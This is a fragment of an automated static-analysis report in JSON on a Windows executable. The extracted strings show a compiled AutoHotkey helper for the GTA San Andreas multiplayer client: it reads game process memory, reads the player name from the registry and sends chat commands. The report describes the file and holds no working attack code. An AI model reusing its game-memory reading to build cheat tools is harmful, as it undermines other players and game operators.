"address": "0x1400e0cb8", "name": "GetWindowRect" }, { "address": "0x1400e0cc0", "name": "GetMonitorInfoW" }, { "address": "0x1400e0cc8", "name": "MonitorFromPoint" }, { "address": "0x1400e0cd0", "name": "GetClientRect" }, { "address": "0x1400e0cd8", "name": "SystemParametersInfoW" }, { "address": "0x1400e0ce0", "name": "AdjustWindowRectEx" }, { "address": "0x1400e0ce8", "name": "DrawTextW" }, { "address": "0x1400e0cf0", "name": "SetRect" }, { "address": "0x1400e0cf8", "name": "GetIconInfo" }, { "address": "0x1400e0d00", "name": "SetWindowTextW" }, { "address": "0x1400e0d08", "name": "IsWindowVisible" }, { "address": "0x1400e0d10", "name": "BlockInput" }, { "address": "0x1400e0d18", "name": "GetMessageW" }, { "address": "0x1400e0d20", "name": "SetTimer" }, { "address": "0x1400e0d28", "name": "GetParent" }, { "address": "0x1400e0d30", "name": "GetDlgCtrlID" }, { "address": "0x1400e0d38", "name": "CharUpperW" }, { "address": "0x1400e0d40", "name": "IsClipboardFormatAvailable" }, { "address": "0x1400e0d48", "name": "CheckMenuItem" }, { "address": "0x1400e0d50", "name": "PostQuitMessage" }, { "address": "0x1400e0d58", "name": "IsCharAlphaW" }, { "address": "0x1400e0d60", "name": "LoadImageW" }, { "address": "0x1400e0d68", "name": "DestroyIcon" } ] }, "GDI32": { "dll": "GDI32.dll", "imports": [ { "address": "0x1400e00f8", "name": "GetPixel" }, { "address": "0x1400e0100", "name": "GetClipRgn" }, { "address": "0x1400e0108", "name": "GetCharABCWidthsW" }, { "address": "0x1400e0110", "name": "SetBkMode" }, { "address": "0x1400e0118", "name": "CreatePatternBrush" }, { "address": "0x1400e0120", "name": "SetBrushOrgEx" }, { "address": "0x1400e0128", "name": "EnumFontFamiliesExW" }, { "address": "0x1400e0130", "name": "CreateDIBSection" }, { "address": "0x1400e0138", "name": "GdiFlush" }, { "address": "0x1400e0140", "name": "SetBkColor" }, { "address": "0x1400e0148", "name": "ExcludeClipRect" }, { "address": "0x1400e0150", "name": "SetTextColor" }, { "address": "0x1400e0158", "name": "GetClipBox" }, { "address": "0x1400e0160", "name": "BitBlt" }, { "address": "0x1400e0168", "name": "CreateCompatibleBitmap" }, { "address": "0x1400e0170", "name": "GetSystemPaletteEntries" }, { "address": "0x1400e0178", "name": "GetDIBits" }, { "address": "0x1400e0180", "name": "CreateCompatibleDC" }, { "address": "0x1400e0188", "name": "CreatePolygonRgn" }, { "address": "0x1400e0190", "name": "CreateRectRgn" }, { "address": "0x1400e0198", "name": "CreateRoundRectRgn" }, { "address": "0x1400e01a0", "name": "CreateEllipticRgn" }, { "address": "0x1400e01a8", "name": "DeleteDC" }, { "address": "0x1400e01b0", "name": "GetObjectW" }, { "address": "0x1400e01b8", "name": "GetTextMetricsW" }, { "address": "0x1400e01c0", "name": "GetTextFaceW" }, { "address": "0x1400e01c8", "name": "SelectObject" }, { "address": "0x1400e01d0", "name": "GetStockObject" }, { "address": "0x1400e01d8", "name": "CreateDCW" }, { "address": "0x1400e01e0", "name": "CreateSolidBrush" }, { "address": "0x1400e01e8", "name": "CreateFontW" }, { "address": "0x1400e01f0", "name": "FillRgn" }, { "address": "0x1400e01f8", "name": "GetDeviceCaps" }, { "address": "0x1400e0200", "name": "DeleteObject" } ] }, "COMDLG32": { "dll": "COMDLG32.dll", "imports": [ { "address": "0x1400e00d8", "name": "CommDlgExtendedError" }, { "address": "0x1400e00e0", "name": "GetSaveFileNameW" }, { "address": "0x1400e00e8", "name": "GetOpenFileNameW" } ] }, "ADVAPI32": { "dll": "ADVAPI32.dll", "imports": [ { "address": "0x1400e0000", "name": "RegDeleteKeyW" }, { "address": "0x1400e0008", "name": "RegSetValueExW" }, { "address": "0x1400e0010", "name": "RegCreateKeyExW" }, { "address": "0x1400e0018", "name": "RegQueryValueExW" }, { "address": "0x1400e0020", "name": "AdjustTokenPrivileges" }, { "address": "0x1400e0028", "name": "LookupPrivilegeValueW" }, { "address": "0x1400e0030", "name": "OpenProcessToken" }, { "address": "0x1400e0038", "name": "CloseServiceHandle" }, { "address": "0x1400e0040", "name": "UnlockServiceDatabase" }, { "address": "0x1400e0048", "name": "LockServiceDatabase" }, { "address": "0x1400e0050", "name": "OpenSCManagerW" }, { "address": "0x1400e0058", "name": "GetUserNameW" }, { "address": "0x1400e0060", "name": "RegEnumKeyExW" }, { "address": "0x1400e0068", "name": "RegEnumValueW" }, { "address": "0x1400e0070", "name": "RegQueryInfoKeyW" }, { "address": "0x1400e0078", "name": "RegOpenKeyExW" }, { "address": "0x1400e0080", "name": "RegCloseKey" }, { "address": "0x1400e0088", "name": "RegConnectRegistryW" }, { "address": "0x1400e0090", "name": "RegDeleteValueW" } ] }, "SHELL32": { "dll": "SHELL32.dll", "imports": [ { "address": "0x1400e07a0", "name": "DragQueryPoint" }, { "address": "0x1400e07a8", "name": "SHEmptyRecycleBinW" }, { "address": "0x1400e07b0", "name": "SHFileOperationW" }, { "address": "0x1400e07b8", "name": "SHGetPathFromIDListW" }, { "address": "0x1400e07c0", "name": "SHBrowseForFolderW" }, { "address": "0x1400e07c8", "name": "SHGetDesktopFolder" }, { "address": "0x1400e07d0", "name": "SHGetMalloc" }, { "address": "0x1400e07d8", "name": "SHGetFolderPathW" }, { "address": "0x1400e07e0", "name": "ShellExecuteExW" }, { "address": "0x1400e07e8", "name": "Shell_NotifyIconW" }, { "address": "0x1400e07f0", "name": "DragFinish" }, { "address": "0x1400e07f8", "name": "DragQueryFileW" }, { "address": "0x1400e0800", "name": "ExtractIconW" } ] }, "ole32": { "dll": "ole32.dll", "imports": [ { "address": "0x1400e0e60", "name": "OleInitialize" }, { "address": "0x1400e0e68", "name": "OleUninitialize" }, { "address": "0x1400e0e70", "name": "CoCreateInstance" }, { "address": "0x1400e0e78", "name": "CoInitialize" }, { "address": "0x1400e0e80", "name": "CoUninitialize" }, { "address": "0x1400e0e88", "name": "CLSIDFromString" }, { "address": "0x1400e0e90", "name": "CLSIDFromProgID" }, { "address": "0x1400e0e98", "name": "CoGetObject" }, { "address": "0x1400e0ea0", "name": "StringFromGUID2" }, { "address": "0x1400e0ea8", "name": "CreateStreamOnHGlobal" } ] }, "OLEAUT32": { "dll": "OLEAUT32.dll", "imports": [ { "address": "0x1400e06d8", "name": "SafeArrayGetLBound" }, { "address": "0x1400e06e0", "name": "GetActiveObject" }, { "address": "0x1400e06e8", "name": "SysStringLen" }, { "address": "0x1400e06f0", "name": "OleLoadPicture" }, { "address": "0x1400e06f8", "name": "SafeArrayUnaccessData" }, { "address": "0x1400e0700", "name": "SafeArrayGetElemsize" }, { "address": "0x1400e0708", "name": "SafeArrayAccessData" }, { "address": "0x1400e0710", "name": "SafeArrayUnlock" }, { "address": "0x1400e0718", "name": "SafeArrayPtrOfIndex" }, { "address": "0x1400e0720", "name": "SafeArrayLock" }, { "address": "0x1400e0728", "name": "SafeArrayGetDim" }, { "address": "0x1400e0730", "name": "SafeArrayDestroy" }, { "address": "0x1400e0738", "name": "SafeArrayGetUBound" }, { "address": "0x1400e0740", "name": "VariantCopyInd" }, { "address": "0x1400e0748", "name": "SafeArrayCopy" }, { "address": "0x1400e0750", "name": "SysAllocString" }, { "address": "0x1400e0758", "name": "VariantChangeType" }, { "address": "0x1400e0760", "name": "VariantClear" }, { "address": "0x1400e0768", "name": "SafeArrayCreate" }, { "address": "0x1400e0770", "name": "SysFreeString" } ] } }, "exported_dll_name": null, "exports": [], "dirents": [ { "name": "IMAGE_DIRECTORY_ENTRY_EXPORT", "virtual_address": "0x00000000", "size": "0x00000000" }, { "name": "IMAGE_DIRECTORY_ENTRY_IMPORT", "virtual_address": "0x0010e37c", "size": "0x0000012c" }, { "name": "IMAGE_DIRECTORY_ENTRY_RESOURCE", "virtual_address": "0x00131000", "size": "0x00008918" }, { "name": "IMAGE_DIRECTORY_ENTRY_EXCEPTION", "virtual_address": "0x0011f000", "size": "0x00007a58" }, { "name": "IMAGE_DIRECTORY_ENTRY_SECURITY", "virtual_address": "0x00000000", "size": "0x00000000" }, { "name": "IMAGE_DIRECTORY_ENTRY_BASERELOC", "virtual_address": "0x00000000", "size": "0x00000000" }, { "name": "IMAGE_DIRECTORY_ENTRY_DEBUG", "virtual_address": "0x00000000", "size": "0x00000000" }, { "name": "IMAGE_DIRECTORY_ENTRY_COPYRIGHT", "virtual_address": "0x00000000", "size": "0x00000000" }, { "name": "IMAGE_DIRECTORY_ENTRY_GLOBALPTR", "virtual_address": "0x00000000", "size": "0x00000000" }, { "name": "IMAGE_DIRECTORY_ENTRY_TLS", "virtual_address": "0x00000000", "size": "0x00000000" }, { "name": "IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG", "virtual_address": "0x00000000", "size": "0x00000000" }, { "name": "IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT", "virtual_address": "0x00000000", "size": "0x00000000" }, { "name": "IMAGE_DIRECTORY_ENTRY_IAT", "virtual_address": "0x000e0000", "size": "0x00000eb8" }, { "name": "IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT", "virtual_address": "0x00000000", "size": "0x00000000" }, { "name": "IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR", "virtual_address": "0x00000000", "size": "0x00000000" }, { "name": "IMAGE_DIRECTORY_ENTRY_RESERVED", "virtual_address": "0x00000000", "size": "0x00000000" } ], "sections": [ { "name": ".text", "raw_address": "0x00000400", "virtual_address": "0x00001000", "virtual_size": "0x000de3c6", "size_of_data": "0x000de400", "characteristics": "IMAGE_SCN_CNT_CODE|IMAGE_SCN_MEM_EXECUTE|IMAGE_SCN_MEM_READ", "characteristics_raw": "0x60000020", "entropy": "6.55" }, { "name": ".rdata", "raw_address": "0x000de800", "virtual_address": "0x000e0000", "virtual_size": "0x000312de", "size_of_data": "0x00031400", "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ", "characteristics_raw": "0x40000040", "entropy": "4.97" }, { "name": ".data", "raw_address": "0x0010fc00", "virtual_address": "0x00112000", "virtual_size": "0x0000c3b8", "size_of_data": "0x00005000", "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE", "characteristics_raw": "0xc0000040", "entropy": "3.31" }, { "name": ".pdata", "raw_address": "0x00114c00", "virtual_address": "0x0011f000", "virtual_size": "0x00007a58", "size_of_data": "0x00007c00", "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ", "characteristics_raw": "0x40000040", "entropy": "5.99" }, { "name": "text", "raw_address": "0x0011c800", "virtual_address": "0x00127000", "virtual_size": "0x0000258d", "size_of_data": "0x00002600", "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_EXECUTE", "characteristics_raw": "0x20000040", "entropy": "5.77" }, { "name": "data", "raw_address": "0x0011ee00", "virtual_address": "0x0012a000", "virtual_size": "0x00006ec0", "size_of_data": "0x00007000", "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ", "characteristics_raw": "0x40000040", "entropy": "6.46" }, { "name": ".rsrc", "raw_address": "0x00125e00", "virtual_address": "0x00131000", "virtual_size": "0x00008918", "size_of_data": "0x00008a00", "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ", "characteristics_raw": "0x40000040", "entropy": "6.31" } ], "overlay": null, "resources": [ { "name": "RT_ICON", "offset": "0x00131458", "size": "0x000010a8", "filetype": null, "language": "LANG_ENGLISH", "sublanguage": "SUBLANG_ENGLISH_US", "entropy": "5.86" }, { "name": "RT_ICON", "offset": "0x00132500", "size": "0x000025a8", "filetype": null, "language": "LANG_ENGLISH", "sublanguage": "SUBLANG_ENGLISH_US", "entropy": "5.37" }, { "name": "RT_ICON", "offset": "0x00134aa8", "size": "0x00000468", "filetype": null, "language": "LANG_ENGLISH", "sublanguage": "SUBLANG_ENGLISH_US", "entropy": "5.68" }, { "name": "RT_ICON", "offset": "0x00134f10", "size": "0x00000468", "filetype": null, "language": "LANG_ENGLISH", "sublanguage": "SUBLANG_ENGLISH_US", "entropy": "5.84" }, { "name": "RT_ICON", "offset": "0x00135378", "size": "0x00000468", "filetype": null, "language": "LANG_ENGLISH", "sublanguage": "SUBLANG_ENGLISH_US", "entropy": "5.33" }, { "name": "RT_ICON", "offset": "0x001357e0", "size": "0x00000468", "filetype": null, "language": "LANG_ENGLISH", "sublanguage": "SUBLANG_ENGLISH_US", "entropy": "5.47" }, { "name": "RT_ICON", "offset": "0x00135c48", "size": "0x00000128", "filetype": null, "language": "LANG_ENGLISH", "sublanguage": "SUBLANG_ENGLISH_US", "entropy": "4.56" }, { "name": "RT_MENU", "offset": "0x00135d70", "size": "0x000002c8", "filetype": null, "language": "LANG_ENGLISH", "sublanguage": "SUBLANG_ENGLISH_US", "entropy": "3.37" }, { "name": "RT_DIALOG", "offset": "0x00136038", "size": "0x000000e8", "filetype": null, "language": "LANG_ENGLISH", "sublanguage": "SUBLANG_ENGLISH_US", "entropy": "2.82" }, { "name": "RT_ACCELERATOR", "offset": "0x00136120", "size": "0x00000048", "filetype": null, "language": "LANG_ENGLISH", "sublanguage": "SUBLANG_ENGLISH_US", "entropy": "2.96" }, { "name": "RT_RCDATA", "offset": "0x00136168", "size": "0x0000301f", "filetype": null, "language": "LANG_ENGLISH", "sublanguage": "SUBLANG_ENGLISH_US", "entropy": "5.76" }, { "name": "RT_GROUP_ICON", "offset": "0x00139188", "size": "0x00000030", "filetype": null, "language": "LANG_ENGLISH", "sublanguage": "SUBLANG_ENGLISH_US", "entropy": "2.46" }, { "name": "RT_GROUP_ICON", "offset": "0x001391b8", "size": "0x00000014", "filetype": null, "language": "LANG_ENGLISH", "sublanguage": "SUBLANG_ENGLISH_US", "entropy": "2.02" }, { "name": "RT_GROUP_ICON", "offset": "0x001391cc", "size": "0x00000014", "filetype": null, "language": "LANG_ENGLISH", "sublanguage": "SUBLANG_ENGLISH_US", "entropy": "1.98" }, { "name": "RT_GROUP_ICON", "offset": "0x001391e0", "size": "0x00000014", "filetype": null, "language": "LANG_ENGLISH", "sublanguage": "SUBLANG_ENGLISH_US", "entropy": "2.08" }, { "name": "RT_GROUP_ICON", "offset": "0x001391f4", "size": "0x00000014", "filetype": null, "language": "LANG_ENGLISH", "sublanguage": "SUBLANG_ENGLISH_US", "entropy": "2.08" }, { "name": "RT_VERSION", "offset": "0x00139208", "size": "0x0000021c", "filetype": null, "language": "LANG_ENGLISH", "sublanguage": "SUBLANG_ENGLISH_US", "entropy": "3.25" }, { "name": "RT_MANIFEST", "offset": "0x00139424", "size": "0x000004f4", "filetype": null, "language": "LANG_ENGLISH", "sublanguage": "SUBLANG_ENGLISH_US", "entropy": "5.35" } ], "versioninfo": [ { "name": "FileDescription", "value": "" }, { "name": "FileVersion", "value": "1.1.37.01" }, { "name": "InternalName", "value": "" }, { "name": "LegalCopyright", "value": "" }, { "name": "CompanyName", "value": "" }, { "name": "OriginalFilename", "value": "" }, { "name": "ProductName", "value": "" }, { "name": "ProductVersion", "value": "1.1.37.01" }, { "name": "Translation", "value": "0x0409 0x04b0" } ], "imphash": "8ebf8cdff0edfb71b612fb21cbde3410", "timestamp": "2023-07-08 05:26:14", "icon": "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", "icon_hash": "26a5a9172b6cdded5702af7b3962ed10", "icon_fuzzy": "1a6ae092b733c43153c15fa33ea788be", "icon_dhash": "fcccc4e4cccc4cbe", "imported_dll_count": 14 }, "data": null, "strings": [ "GetDC", "Class", "H!D$ D", "#IfTimeout", "OF>;^", "t$@H3", "Clipboard:=Key", "user32", "H9U8u", "#InputLevel", "PriorKey", "CfD9#u", "H9l$@u", "Hc|$X", "IsValidCodePage", "AtlAxGetControl", "OLEAUT32.dll", "player := prread(getprocessid(), 0xB6F5F0)", "D9D$`", "*uzfE9e", "CRLF)", ")t$ A", "t$(93", "D$$A;", " h(((( H", "WinSet", "StatusBar", ";L$Pu7A", "K0LcY", "hud:=!hud", "|$ L+", "variable", "VVVVVVVVVVVVV", "RWin ", "<>=/|^,:*&~!()[]{}+-?", "|$ Ic", "%sTop", "L9h8u", "rp := RegExReplace(rp, \"\\Q$\\Eday\", time.d)", "d$0H9K", "D8L$qt", "!\\$0!\\$(!\\$ L", "RtlGetVersion", "\\C not allowed in lookbehind assertion", "H;_8s'H", "settimer, arem, 1", "[[[[[[[[[", "RawRead", "A;D$ ", "\\: (.*)_(.*)\", nick)", "t$LD+l$@D+t$DD", "DrawTextW", "gui, 5:color, black", "D$pfA", "SoundGetWaveVolume", "Mouse", "[[[[[[[[[[[[[[[[[[[[[[[[", "Uppercase", "9qT~EH", "Process", "ERROR", "Invalid usage.", "MapVirtualKeyW", "WinHide", "H;n8|", "Too few parameters passed to function.", "Lowercase", "UVWATAUAVAWH", "@UWAUH", "T$XD;T$\\", " A\\_^", "?@En[vP", "f9-#@", "T$XLcL$HL", "Hct$PH", "-64OS", "GuiControl, 1:, M4, % ahk[i+1]", "Out of memory. The current thread will exit.", "LineCount", "(;k r", "IfGreaterOrEqual", "[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[", "GetText", " (%0.2f)", "GetFileVersionInfoW", "@UAVH", "A_A^A]A\\_", "sleep 1100", "Mouse hook: %s", "Could not open URL https://autohotkey.com in default browser.", "FormatInteger", "global agun, id1, id2, remed, nick1, nick2, id2, pass, i, li, apt, arbar, hpbar, hud:=1, hp, ar", "FileGetVersion", "KeyDelayPlay", "SetMenu", ".?AVObject@@", "frexp", "D9P(t", "d$ UH", "@8|$8t", "PCRE does not support \\L, \\l, \\N{name}, \\U, or \\u", "|$8E2", "SystemTimeToFileTime", "Unexpected \")\"", "Tt@E3", "Olive", "@sqrt", "ComboBox", "NH+D$TD", "ascii", "Restore", "v#H;k", "Myanmar", "(?R or (?[+-]digits must be followed by )", "IsDialogMessageW", "L$`uT", "[ UVWH", "EndMods", "[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[", "Parent", "Cursor", "A_A^A]A\\^][", "|$ fE", "Program: ", "fD9#t", "M09u(u}H", "]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]", "GetProcAddress", "OSVersion", "\\$ UVWAUAWH", "QueryPerformanceCounter", "Unhandled exception.", "@8=aw", "GuiControlEvent", "t$ UATAUAVAWH", "?JV8f", "IsWindowVisible", "DEFINE group contains more than one branch", "StdOut", "Catch", "Numpad2", "Yacute", "A9q$~", "v%H;w", "WINMM.dll", "KbdLayerDescriptor", "KeyHistory", "VerCompare", "H9JHw", "|$(E3", "SUVWATAUH", "gdi32", "graph", "{Blind}{%s Up}", "D%0fA", "oacute", "L$8H3", "t'H+D$`L", "T$8;A ", ";_ r\"H", "9\\$8t", "\\$ WAUAVH", "SplitPath", "RegRead, nick, HKEY_CURRENT_USER, Software\\SAMP, PlayerName", "__fastcall", "#IncludeAgain", "local", "ntilde", "D8\"u%H", "8\\$sH", "gui, 5:show, x%xap% y%yap% w250 h130 NoActivate, ", "Linear_B", "Double", "if(i==li)", "AtEOF", "A+C0L", "uvfD9%H", "t$ ATAUAV", "L$hE3", "T$`+T$X", "#SingleInstance", "Uacute", "D$\\A;", "Gui, 3:+ToolWindow -Caption +Owner +AlwaysOnTop +E0x20", "eacute", "@A_A^A\\_^][", "CTRLDOWN", "UpArrow", "BackspaceIsUndo", "GetBase", "\\$0t=H", "fD9 u", "if GetKeyState(\"ESC\", \"P\") or GetKeyState(\"F6\", \"P\") {", "DeleteCol", "fA9<$t", "L$ UVWATAUAV", ":u#fD9i", "L$(I#", "L$8M#", "D$&8\\$&t-8X", "1#QNAN", "mouse_event", "ClientToScreen", "IfWinNotExist GTA:SA:MP", "RegExmatch(ar, \"(.*)\\.\", sar)", "EnableThemeDialogTexture", "GetStdHandle", "Bottom", "SetKeyboardState", "AltTabAndMenu", "unmatched parentheses", "Built-in variables must not be declared.", "(;Y r", ")t$Pf", "umH9|$8t", "(;~ r", "t[9-h", "VWATH", "\\$ UH", "C0;C sAH", "l$@fffff", "L$hffff", "__thiscall", "getid() {", "close AHK_PlayMe", "Armenian", "__Call", "d$LIcETD", "IGNORE", "GetTickCount", "A label must not point to an ELSE or UNTIL or CATCH.", "[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[", "uLffff", "class", "IsObject", "punct", "SetTimer, acuff, 1", "yag:=A_ScreenHeight - 40", "{LCtrl up}", "] is an invalid data character in JavaScript compatibility mode", "WinKill", "v\"H;w", "cedil", "?}u&A", "\\$HE3", "D;D$T", "u?9G,t!3", "internal error: previously-checked referenced subpattern not found", "Gui, launcher:Add, Text, x18 y19 w270 h30 +Center, ", "AElig", "`vftable'", "f;D$@uD", "Old_Italic", "Client", "For %s,%s in %s", "ULlTt", "Compile error %d at offset %d: %hs", "return object(\"d\", A_DD, \"m\", A_MM, \"y\", A_Year, \"h\", A_Hour, \"m\", A_Min, \"s\", A_Sec)", "EventInfo", "GetWindow", "SendAndMouse", "SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS\\VVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVV[[[[[[[[[[[[[[[[[[[[[VVVV", "SetHandleCount", "sleep 1", "SetBkColor", "RShift", "ListBox", "raquo", "y,.u+", "Tagbanwa", "_hypot", "L$ffD", "v%H;{", "A^A]A\\_^]", "FocusV", "WinGetClass", "|$@tE", "FileInstall", "Listbox", "No tray mem", "ATAUAVH", "u+H9s", "[\\]^_`", "(A_A]A\\]", "USVWAWH", "ub8\\$Du\\", "WinMinimizeAll", "Random", "StringSplit", "v(L;g", "RegDeleteKeyExW", "An older instance of this script is already running. Replace it with this instance?", "v%I;^", "StrSplit", "$+L;d$Hr*K", "GetVersion", "WinGet", "l$ D!", "Gui, launcher:Add, Text, x22 y49 w260 h20 +Center, %nick%", "SUVWATAUAVAWH", "<>=/|^,:.+-*&!?~", "@8q#u", "]/D+]'A", "TimeSinceThisHotkey", "fA9<$", "fA9T$", "T$@A;", "static", "WantReturn", "this version of PCRE is not compiled with Unicode property support", "GetOEMCP", "9D$xuXH", "XA_A^A]A\\_^[]", "t$ H;", "Delete", "\\\\.\\%c:", "|$xH+", "SubStr", "˜", "H9D$8ubI", "VERSION.dll", "StringLen", "v2L;c", "T$lf9", "0A]A\\_^]", "p WATAUAVAWH", "8A]A\\", "IfWinNotExist", "FileSetAttrib", "Input, input, V I M, {ENTER}{ESC}{F6}", "vk%02X", "u;D9%rH", "Thaana", "B0H9A0", "D8i#u", "A^A]A\\_^", "InsertCol", "Keybd hook: %s", "SetCapslockState", "Numpad3", "uBfA9E", "l$JfD", "fD91u:A", "( 8PX", "HICON:", "icirc", "Duplicate declaration.", "DragFinish", "QueryDosDeviceW", "Default:", "GuiControl, 5:+cGreen +Redraw, pstatus, ", "KeyUp", "0A\\^]", "`A_A^_][", "11GuiClose:", "CapsLock", ":?:/r::", "IniRead, slots, rp.ini, settings, slots", "Functions cannot contain functions.", "D$$E3", "Source:", "f9t$0tyH", "BF>^G", "L0:A:", "fD9+u", "Invalid or nonexistent owner or parent window.", "x0Du'", "|$@-D", "abcdefghijklmnopqrstuvwxyz", "gui, 1:add, text, cGreen vM3 x0 w250 Center, % ahk[i]", "SUVWATAUAVH", "MenuGetHandle", "HcT$P", ")f9l$ ", "*D$0f", "H9|$8", "0A]_]", "A\" upHc", "L$dLc", " Type Descriptor'", "D8d$8t", "GetMessageW", "t\\fA9E", "GetSubMenu", "SHBrowseForFolderW", "SetWinDelay -1", "E9,$~T3", "if !RegExmatch(getchatline(findline(\"", "PostThreadMessageW", "V(N9\\", "|$(fD", "d$PfA#", "Error text not found (please report)", "floor", "2fD9!t", "@SUVWATH", "ExStyle", "fD; sSH", "SUVWATAUAWH", "L$xfD", "regular expression is too large", "Numpad9", "(A^A]", "CoordMode", "MouseDelayPlay", "FileDescription", "FileMoveDir", "Ntilde", " A]A\\_", "D$@?H", "@SUVWAUAVAWH", "Tagalog", "HeapFree", "C:f9C", "H9\\$p", "gui, 3:hide", "]HfA;", "Throw", "UWAUH", "Normal", "H", "D8q#u", "SetTimer, patrol, 1", "|$hfA", "Gui, launcher:Destroy", "gui, 6:add, text, cBlue varbar, ", "Check", "I;t$0|", "EnumClipboardFormats", "", "GdipCreateBitmapFromFile", "sendchat(\"/rem\")", "AutoHotkeyGUI", "KeyWait", "SetFileTime", "Value", "OpenSCManagerW", "Gui, 1:Show, y%y% x%x% w250 NoActivate, ", "t8ffffff", "@SWATAVAWH", "ExtractIconW", 